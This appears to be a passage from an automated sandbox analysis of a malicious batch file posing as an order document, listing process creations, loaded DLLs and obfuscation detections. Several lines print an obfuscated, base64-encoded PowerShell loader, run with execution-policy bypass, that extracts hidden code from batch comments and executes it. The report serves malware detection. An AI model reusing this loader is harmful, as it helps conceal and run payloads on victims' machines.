                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vyc2lla2xOYW1lIHNpZWtsPSAkZW5zaWVrbHY6VVNFc2lla2xSTkFNRXNpZWtsOyRxY2dzaWVrbGttID0gc2lla2wiQzpcVXNpZWtsc2Vyc1xzaWVrbCR1c2Vyc2lla2xOYW1lXHNpZWtsZHdtLmJzaWVrbGF0Ijtpc2lla2xmIChUZXNpZWtsc3QtUGFzaWVrbHRoICRxc2lla2xjZ2ttKXNpZWtsIHsgICBzaWVrbCBXcml0c2lla2xlLUhvc3NpZWtsdCAiQmFzaWVrbHRjaCBmc2lla2xpbGUgZnNpZWtsb3VuZDpzaWVrbCAkcWNnc2lla2xrbSIgLXNpZWtsRm9yZWdzaWVrbHJvdW5kc2lla2xDb2xvcnNpZWtsIEN5YW5zaWVrbDsgICAgc2lla2wkZmlsZXNpZWtsTGluZXNzaWVrbCA9IFtTc2lla2x5c3RlbXNpZWtsLklPLkZzaWVrbGlsZV06c2lla2w6UmVhZHNpZWtsQWxsTGlzaWVrbG5lcygkc2lla2xxY2drbXNpZWtsLCBbU3lzaWVrbHN0ZW0uc2lla2xUZXh0LnNpZWtsRW5jb2RzaWVrbGluZ106c2lla2w6VVRGOHNpZWtsKTsgICBzaWVrbCBmb3Jlc2lla2xhY2ggKHNpZWtsJGxpbmVzaWVrbCBpbiAkc2lla2xmaWxlTHNpZWtsaW5lcylzaWVrbCB7ICAgc2lla2wgICAgIHNpZWtsaWYgKCRzaWVrbGxpbmUgc2lla2wtbWF0Y3NpZWtsaCAnXjpzaWVrbDo6ID8oc2lla2wuKykkJ3NpZWtsKSB7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsV3JpdGVzaWVrbC1Ib3N0c2lla2wgIkluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlIGRldHNpZWtsZWN0ZWRzaWVrbCBpbiB0c2lla2xoZSBiYXNpZWtsdGNoIGZzaWVrbGlsZS4ic2lla2wgLUZvcnNpZWtsZWdyb3VzaWVrbG5kQ29sc2lla2xvciBDeXNpZWtsYW47ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsdHJ5IHtzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAkZGVjc2lla2xvZGVkQnNpZWtseXRlcyBzaWVrbD0gW1N5c2lla2xzdGVtLnNpZWtsQ29udmVzaWVrbHJ0XTo6c2lla2xGcm9tQnNpZWtsYXNlNjRzaWVrbFN0cmluc2lla2xnKCRtYXNpZWtsdGNoZXNzaWVrbFsxXS5Uc2lla2xyaW0oKXNpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgJGlzaWVrbG5qZWN0c2lla2xpb25Db3NpZWtsZGUgPSBzaWVrbFtTeXN0c2lla2xlbS5UZXNpZWtseHQuRW5zaWVrbGNvZGluc2lla2xnXTo6VXNpZWtsbmljb2RzaWVrbGUuR2V0c2lla2xTdHJpbnNpZWtsZygkZGVzaWVrbGNvZGVkc2lla2xCeXRlc3NpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgV3JzaWVrbGl0ZS1Ic2lla2xvc3QgInNpZWtsSW5qZWNzaWVrbHRpb24gc2lla2xjb2RlIHNpZWtsZGVjb2RzaWVrbGVkIHN1c2lla2xjY2Vzc3NpZWtsZnVsbHlzaWVrbC4iIC1Gc2lla2xvcmVncnNpZWtsb3VuZENzaWVrbG9sb3Igc2lla2xHcmVlbnNpZWtsOyAgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICBXcmlzaWVrbHRlLUhvc2lla2xzdCAiRXNpZWtseGVjdXRzaWVrbGluZyBpc2lla2xuamVjdHNpZWtsaW9uIGNzaWVrbG9kZS4uc2lla2wuIiAtRnNpZWtsb3JlZ3JzaWVrbG91bmRDc2lla2xvbG9yIHNpZWtsWWVsbG9zaWVrbHc7ICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgIEluc2lla2x2b2tlLXNpZWtsRXhwcmVzaWVrbHNzaW9uc2lla2wgJGluanNpZWtsZWN0aW9zaWVrbG5Db2Rlc2lla2w7ICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2wgIGJyZXNpZWtsYWs7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsfSBjYXRzaWVrbGNoIHsgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2xXcml0ZXNpZWtsLUhvc3RzaWVrbCAiRXJyc2lla2xvciBkdXNpZWtscmluZyBzaWVrbGRlY29kc2lla2xpbmcgb3NpZWtsciBleGVzaWVrbGN1dGluc2lla2xnIGluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlOiAkX3NpZWtsIiAtRm9zaWVrbHJlZ3Jvc2lla2x1bmRDb3NpZWtsbG9yIFJzaWVrbGVkOyAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbH07ICAgc2lla2wgICAgIHNpZWtsfTsgICBzaWVrbCB9O30gc2lla2xlbHNlIHNpZWtseyAgICBzaWVrbCAgV3Jpc2lla2x0ZS1Ib3NpZWtsc3QgIlNzaWVrbHlzdGVtc2lla2wgRXJyb3NpZWtscjogQm
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\order no_3_17_2025 ref_HR 6473876476374647464657464564764746.bat" Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vyc2lla2xOYW1lIHNpZWtsPSAkZW5zaWVrbHY6VVNFc2lla2xSTkFNRXNpZWtsOyRxY2dzaWVrbGttID0gc2lla2wiQzpcVXNpZWtsc2Vyc1xzaWVrbCR1c2Vyc2lla2xOYW1lXHNpZWtsZHdtLmJzaWVrbGF0Ijtpc2lla2xmIChUZXNpZWtsc3QtUGFzaWVrbHRoICRxc2lla2xjZ2ttKXNpZWtsIHsgICBzaWVrbCBXcml0c2lla2xlLUhvc3NpZWtsdCAiQmFzaWVrbHRjaCBmc2lla2xpbGUgZnNpZWtsb3VuZDpzaWVrbCAkcWNnc2lla2xrbSIgLXNpZWtsRm9yZWdzaWVrbHJvdW5kc2lla2xDb2xvcnNpZWtsIEN5YW5zaWVrbDsgICAgc2lla2wkZmlsZXNpZWtsTGluZXNzaWVrbCA9IFtTc2lla2x5c3RlbXNpZWtsLklPLkZzaWVrbGlsZV06c2lla2w6UmVhZHNpZWtsQWxsTGlzaWVrbG5lcygkc2lla2xxY2drbXNpZWtsLCBbU3lzaWVrbHN0ZW0uc2lla2xUZXh0LnNpZWtsRW5jb2RzaWVrbGluZ106c2lla2w6VVRGOHNpZWtsKTsgICBzaWVrbCBmb3Jlc2lla2xhY2ggKHNpZWtsJGxpbmVzaWVrbCBpbiAkc2lla2xmaWxlTHNpZWtsaW5lcylzaWVrbCB7ICAgc2lla2wgICAgIHNpZWtsaWYgKCRzaWVrbGxpbmUgc2lla2wtbWF0Y3NpZWtsaCAnXjpzaWVrbDo6ID8oc2lla2wuKykkJ3NpZWtsKSB7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsV3JpdGVzaWVrbC1Ib3N0c2lla2wgIkluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlIGRldHNpZWtsZWN0ZWRzaWVrbCBpbiB0c2lla2xoZSBiYXNpZWtsdGNoIGZzaWVrbGlsZS4ic2lla2wgLUZvcnNpZWtsZWdyb3VzaWVrbG5kQ29sc2lla2xvciBDeXNpZWtsYW47ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsdHJ5IHtzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAkZGVjc2lla2xvZGVkQnNpZWtseXRlcyBzaWVrbD0gW1N5c2lla2xzdGVtLnNpZWtsQ29udmVzaWVrbHJ0XTo6c2lla2xGcm9tQnNpZWtsYXNlNjRzaWVrbFN0cmluc2lla2xnKCRtYXNpZWtsdGNoZXNzaWVrbFsxXS5Uc2lla2xyaW0oKXNpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgJGlzaWVrbG5qZWN0c2lla2xpb25Db3NpZWtsZGUgPSBzaWVrbFtTeXN0c2lla2xlbS5UZXNpZWtseHQuRW5zaWVrbGNvZGluc2lla2xnXTo6VXNpZWtsbmljb2RzaWVrbGUuR2V0c2lla2xTdHJpbnNpZWtsZygkZGVzaWVrbGNvZGVkc2lla2xCeXRlc3NpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgV3JzaWVrbGl0ZS1Ic2lla2xvc3QgInNpZWtsSW5qZWNzaWVrbHRpb24gc2lla2xjb2RlIHNpZWtsZGVjb2RzaWVrbGVkIHN1c2lla2xjY2Vzc3NpZWtsZnVsbHlzaWVrbC4iIC1Gc2lla2xvcmVncnNpZWtsb3VuZENzaWVrbG9sb3Igc2lla2xHcmVlbnNpZWtsOyAgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICBXcmlzaWVrbHRlLUhvc2lla2xzdCAiRXNpZWtseGVjdXRzaWVrbGluZyBpc2lla2xuamVjdHNpZWtsaW9uIGNzaWVrbG9kZS4uc2lla2wuIiAtRnNpZWtsb3JlZ3JzaWVrbG91bmRDc2lla2xvbG9yIHNpZWtsWWVsbG9zaWVrbHc7ICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgIEluc2lla2x2b2tlLXNpZWtsRXhwcmVzaWVrbHNzaW9uc2lla2wgJGluanNpZWtsZWN0aW9zaWVrbG5Db2Rlc2lla2w7ICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2wgIGJyZXNpZWtsYWs7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsfSBjYXRzaWVrbGNoIHsgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2xXcml0ZXNpZWtsLUhvc3RzaWVrbCAiRXJyc2lla2xvciBkdXNpZWtscmluZyBzaWVrbGRlY29kc2lla2xpbmcgb3NpZWtsciBleGVzaWVrbGN1dGluc2lla2xnIGluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlOiAkX3NpZWtsIiAtRm9zaWVrbHJlZ3Jvc2lla2x1bmRDb3NpZWtsbG9yIFJzaWVrbGVkOyAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbH07ICAgc2lla2wgICAgIHNpZWtsfTsgICBzaWVrbCB9O30gc2lla2xlbHNlIHNpZWtseyAgICBzaWVrbCAgV3Jpc2lla2x0ZS1Ib3NpZWtsc3QgIlNzaWVrbHlzdGVtc2lla2wgRXJyb3NpZWtscjogQmJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vaultcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

                            Data Obfuscation

                            barindex
                            Source: 4.2.powershell.exe.5f93858.2.raw.unpack, ibpaxdfrhq.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                            Source: 4.2.powershell.exe.5fca298.6.raw.unpack, ibpaxdfrhq.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                            Source: 4.2.powershell.exe.5f6b838.3.raw.unpack, ibpaxdfrhq.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                            Source: 4.2.powershell.exe.82c0000.7.raw.unpack, ibpaxdfrhq.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly($asmName, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $modBuilder = $asmBuilder.DefineDynamicModule('DynModule', $false) $typeBuilder = $modBuilder
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vyc2lla2xOYW1lIHNpZWtsPSAkZW5zaWVrbHY6VVNFc2lla2xSTkFNRXNpZWtsOyRxY2dzaWVrbGttID0gc2lla2wiQzpcVXNpZWtsc2Vyc1xzaWVrbCR1c2Vyc2lla2xOYW1lXHNpZWtsZH
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vyc2lla2xOYW1lIHNpZWtsPSAkZW5zaWVrbHY6VVNFc2lla2xSTkFNRXNpZWtsOyRxY2dzaWVrbGttID0gc2lla2wiQzpcVXNpZWtsc2Vyc1xzaWVrbCR1c2Vyc2lla2xOYW1lXHNpZWtsZHdtLmJzaWVrbGF0Ijtpc2lla2xmIChUZXNpZWtsc3QtUGFzaWVrbHRoICRxc2lla2xjZ2ttKXNpZWtsIHsgICBzaWVrbCBXcml0c2lla2xlLUhvc3NpZWtsdCAiQmFzaWVrbHRjaCBmc2lla2xpbGUgZnNpZWtsb3VuZDpzaWVrbCAkcWNnc2lla2xrbSIgLXNpZWtsRm9yZWdzaWVrbHJvdW5kc2lla2xDb2xvcnNpZWtsIEN5YW5zaWVrbDsgICAgc2lla2wkZmlsZXNpZWtsTGluZXNzaWVrbCA9IFtTc2lla2x5c3RlbXNpZWtsLklPLkZzaWVrbGlsZV06c2lla2w6UmVhZHNpZWtsQWxsTGlzaWVrbG5lcygkc2lla2xxY2drbXNpZWtsLCBbU3lzaWVrbHN0ZW0uc2lla2xUZXh0LnNpZWtsRW5jb2RzaWVrbGluZ106c2lla2w6VVRGOHNpZWtsKTsgICBzaWVrbCBmb3Jlc2lla2xhY2ggKHNpZWtsJGxpbmVzaWVrbCBpbiAkc2lla2xmaWxlTHNpZWtsaW5lcylzaWVrbCB7ICAgc2lla2wgICAgIHNpZWtsaWYgKCRzaWVrbGxpbmUgc2lla2wtbWF0Y3NpZWtsaCAnXjpzaWVrbDo6ID8oc2lla2wuKykkJ3NpZWtsKSB7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsV3JpdGVzaWVrbC1Ib3N0c2lla2wgIkluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlIGRldHNpZWtsZWN0ZWRzaWVrbCBpbiB0c2lla2xoZSBiYXNpZWtsdGNoIGZzaWVrbGlsZS4ic2lla2wgLUZvcnNpZWtsZWdyb3VzaWVrbG5kQ29sc2lla2xvciBDeXNpZWtsYW47ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsdHJ5IHtzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAkZGVjc2lla2xvZGVkQnNpZWtseXRlcyBzaWVrbD0gW1N5c2lla2xzdGVtLnNpZWtsQ29udmVzaWVrbHJ0XTo6c2lla2xGcm9tQnNpZWtsYXNlNjRzaWVrbFN0cmluc2lla2xnKCRtYXNpZWtsdGNoZXNzaWVrbFsxXS5Uc2lla2xyaW0oKXNpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgJGlzaWVrbG5qZWN0c2lla2xpb25Db3NpZWtsZGUgPSBzaWVrbFtTeXN0c2lla2xlbS5UZXNpZWtseHQuRW5zaWVrbGNvZGluc2lla2xnXTo6VXNpZWtsbmljb2RzaWVrbGUuR2V0c2lla2xTdHJpbnNpZWtsZygkZGVzaWVrbGNvZGVkc2lla2xCeXRlc3NpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgV3JzaWVrbGl0ZS1Ic2lla2xvc3QgInNpZWtsSW5qZWNzaWVrbHRpb24gc2lla2xjb2RlIHNpZWtsZGVjb2RzaWVrbGVkIHN1c2lla2xjY2Vzc3NpZWtsZnVsbHlzaWVrbC4iIC1Gc2lla2xvcmVncnNpZWtsb3VuZENzaWVrbG9sb3Igc2lla2xHcmVlbnNpZWtsOyAgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICBXcmlzaWVrbHRlLUhvc2lla2xzdCAiRXNpZWtseGVjdXRzaWVrbGluZyBpc2lla2xuamVjdHNpZWtsaW9uIGNzaWVrbG9kZS4uc2lla2wuIiAtRnNpZWtsb3JlZ3JzaWVrbG91bmRDc2lla2xvbG9yIHNpZWtsWWVsbG9zaWVrbHc7ICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgIEluc2lla2x2b2tlLXNpZWtsRXhwcmVzaWVrbHNzaW9uc2lla2wgJGluanNpZWtsZWN0aW9zaWVrbG5Db2Rlc2lla2w7ICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2wgIGJyZXNpZWtsYWs7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsfSBjYXRzaWVrbGNoIHsgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2xXcml0ZXNpZWtsLUhvc3RzaWVrbCAiRXJyc2lla2xvciBkdXNpZWtscmluZyBzaWVrbGRlY29kc2lla2xpbmcgb3NpZWtsciBleGVzaWVrbGN1dGluc2lla2xnIGluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlOiAkX3NpZWtsIiAtRm9zaWVrbHJlZ3Jvc2lla2x1bmRDb3NpZWtsbG9yIFJzaWVrbGVkOyAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbH07ICAgc2lla2wgICAgIHNpZWtsfTsgICBzaWVrbCB9O30gc2lla2xlbHNlIHNpZWtseyAgICBzaWVrbCAgV3Jpc2lla2x0ZS1Ib3NpZWtsc3QgIlNzaWVrbHlzdGVtc2lla2wgRXJyb3NpZWtscjogQm
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vyc2lla2xOYW1lIHNpZWtsPSAkZW5zaWVrbHY6VVNFc2lla2xSTkFNRXNpZWtsOyRxY2dzaWVrbGttID0gc2lla2wiQzpcVXNpZWtsc2Vyc1xzaWVrbCR1c2Vyc2lla2xOYW1lXHNpZWtsZHdtLmJzaWVrbGF0Ijtpc2lla2xmIChUZXNpZWtsc3QtUGFzaWVrbHRoICRxc2lla2xjZ2ttKXNpZWtsIHsgICBzaWVrbCBXcml0c2lla2xlLUhvc3NpZWtsdCAiQmFzaWVrbHRjaCBmc2lla2xpbGUgZnNpZWtsb3VuZDpzaWVrbCAkcWNnc2lla2xrbSIgLXNpZWtsRm9yZWdzaWVrbHJvdW5kc2lla2xDb2xvcnNpZWtsIEN5YW5zaWVrbDsgICAgc2lla2wkZmlsZXNpZWtsTGluZXNzaWVrbCA9IFtTc2lla2x5c3RlbXNpZWtsLklPLkZzaWVrbGlsZV06c2lla2w6UmVhZHNpZWtsQWxsTGlzaWVrbG5lcygkc2lla2xxY2drbXNpZWtsLCBbU3lzaWVrbHN0ZW0uc2lla2xUZXh0LnNpZWtsRW5jb2RzaWVrbGluZ106c2lla2w6VVRGOHNpZWtsKTsgICBzaWVrbCBmb3Jlc2lla2xhY2ggKHNpZWtsJGxpbmVzaWVrbCBpbiAkc2lla2xmaWxlTHNpZWtsaW5lcylzaWVrbCB7ICAgc2lla2wgICAgIHNpZWtsaWYgKCRzaWVrbGxpbmUgc2lla2wtbWF0Y3NpZWtsaCAnXjpzaWVrbDo6ID8oc2lla2wuKykkJ3NpZWtsKSB7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsV3JpdGVzaWVrbC1Ib3N0c2lla2wgIkluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlIGRldHNpZWtsZWN0ZWRzaWVrbCBpbiB0c2lla2xoZSBiYXNpZWtsdGNoIGZzaWVrbGlsZS4ic2lla2wgLUZvcnNpZWtsZWdyb3VzaWVrbG5kQ29sc2lla2xvciBDeXNpZWtsYW47ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsdHJ5IHtzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAkZGVjc2lla2xvZGVkQnNpZWtseXRlcyBzaWVrbD0gW1N5c2lla2xzdGVtLnNpZWtsQ29udmVzaWVrbHJ0XTo6c2lla2xGcm9tQnNpZWtsYXNlNjRzaWVrbFN0cmluc2lla2xnKCRtYXNpZWtsdGNoZXNzaWVrbFsxXS5Uc2lla2xyaW0oKXNpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgJGlzaWVrbG5qZWN0c2lla2xpb25Db3NpZWtsZGUgPSBzaWVrbFtTeXN0c2lla2xlbS5UZXNpZWtseHQuRW5zaWVrbGNvZGluc2lla2xnXTo6VXNpZWtsbmljb2RzaWVrbGUuR2V0c2lla2xTdHJpbnNpZWtsZygkZGVzaWVrbGNvZGVkc2lla2xCeXRlc3NpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgV3JzaWVrbGl0ZS1Ic2lla2xvc3QgInNpZWtsSW5qZWNzaWVrbHRpb24gc2lla2xjb2RlIHNpZWtsZGVjb2RzaWVrbGVkIHN1c2lla2xjY2Vzc3NpZWtsZnVsbHlzaWVrbC4iIC1Gc2lla2xvcmVncnNpZWtsb3VuZENzaWVrbG9sb3Igc2lla2xHcmVlbnNpZWtsOyAgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICBXcmlzaWVrbHRlLUhvc2lla2xzdCAiRXNpZWtseGVjdXRzaWVrbGluZyBpc2lla2xuamVjdHNpZWtsaW9uIGNzaWVrbG9kZS4uc2lla2wuIiAtRnNpZWtsb3JlZ3JzaWVrbG91bmRDc2lla2xvbG9yIHNpZWtsWWVsbG9zaWVrbHc7ICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgIEluc2lla2x2b2tlLXNpZWtsRXhwcmVzaWVrbHNzaW9uc2lla2wgJGluanNpZWtsZWN0aW9zaWVrbG5Db2Rlc2lla2w7ICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2wgIGJyZXNpZWtsYWs7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsfSBjYXRzaWVrbGNoIHsgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2xXcml0ZXNpZWtsLUhvc3RzaWVrbCAiRXJyc2lla2xvciBkdXNpZWtscmluZyBzaWVrbGRlY29kc2lla2xpbmcgb3NpZWtsciBleGVzaWVrbGN1dGluc2lla2xnIGluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlOiAkX3NpZWtsIiAtRm9zaWVrbHJlZ3Jvc2lla2x1bmRDb3NpZWtsbG9yIFJzaWVrbGVkOyAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbH07ICAgc2lla2wgICAgIHNpZWtsfTsgICBzaWVrbCB9O30gc2lla2xlbHNlIHNpZWtseyAgICBzaWVrbCAgV3Jpc2lla2x0ZS1Ib3NpZWtsc3QgIlNzaWVrbHlzdGVtc2lla2w